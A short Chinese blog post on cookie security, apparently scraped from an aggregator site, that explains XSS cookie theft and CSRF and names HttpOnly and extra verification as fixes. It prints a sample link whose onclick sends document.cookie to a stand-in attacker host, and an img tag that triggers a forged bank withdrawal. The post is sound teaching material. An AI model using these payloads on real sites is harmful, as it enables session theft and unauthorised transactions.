cookie安全
来源:互联网 发布:南京网络作家协会 编辑:程序博客网 时间:2024/06/08 02:52
跨站点脚本XSS
使用跨站点脚本技术可以窃取cookie。当网站允许使用javascript操作cookie的时候,就会发生攻击者发布恶意代码攻击用户的会话,同时可以拿到用户的cookie信息。
例子:
<a href="#" onclick=`window.location=http://abc.com?cookie=${docuemnt.cookie}`>领取红包</a>
当用户点击这个链接的时候,浏览器就会执行onclick里面的代码,结果这个网站用户的cookie信息就会被发送到http://abc.com攻击者的服务器。攻击者同样可以拿cookie搞事情。
解决办法:可以通过cookie的HttpOnly属性,设置了HttpOnly属性,javascript代码将不能操作cookie。
跨站请求伪造CSRF
例如,SanShao可能正在浏览其他用户XiaoMing发布消息的聊天论坛。假设XiaoMing制作了一个引用ShanShao银行网站的HTML图像元素,例如,
<img src = "http://www.bank.com/withdraw?user=SanShao&amount=999999&for=XiaoMing" >
如果SanShao的银行将其认证信息保存在cookie中,并且cookie尚未过期,(当然是没有其他验证身份的东西),那么SanShao的浏览器尝试加载该图片将使用他的cookie提交提款表单,从而在未经SanShao批准的情况下授权交易。
解决办法:增加其他信息的校验(手机验证码,或者其他盾牌)。
阅读全文
0 0
- Cookie安全
- cookie、安全
- cookie安全
- tornado cookie 和cookie安全
- Cookie安全漫谈
- Cookie安全漫谈
- Cookie安全漫谈
- Cookie安全漫谈
- Cookie安全漫谈
- Cookie 安全测试
- Cookie安全漫谈
- 安全cookie setSecure详解
- Cookie安全漫谈
- Cookie使用和安全
- [web安全] Cookie注入
- Cookie安全漫谈
- cookie安全机制
- cookie安全加密
- spring配置多个动态数据
- golang的import
- PHP代码http跳转到https
- 第五周 项目3
- 开源数据库InfluxDB常用函数
- cookie安全
- Android中使用RecyclerView + SnapHelper实现类似ViewPager效果
- three.js加载vtk模型
- 跨域
- linux折腾日记:校园网锐捷上网设置
- 70. Climbing Stairs
- 通达OA工作流程-使用方法
- selenium上传附件(借助AutoIt识别Windows上传窗口)
- Onenet EDP协议调试(1)-设备登陆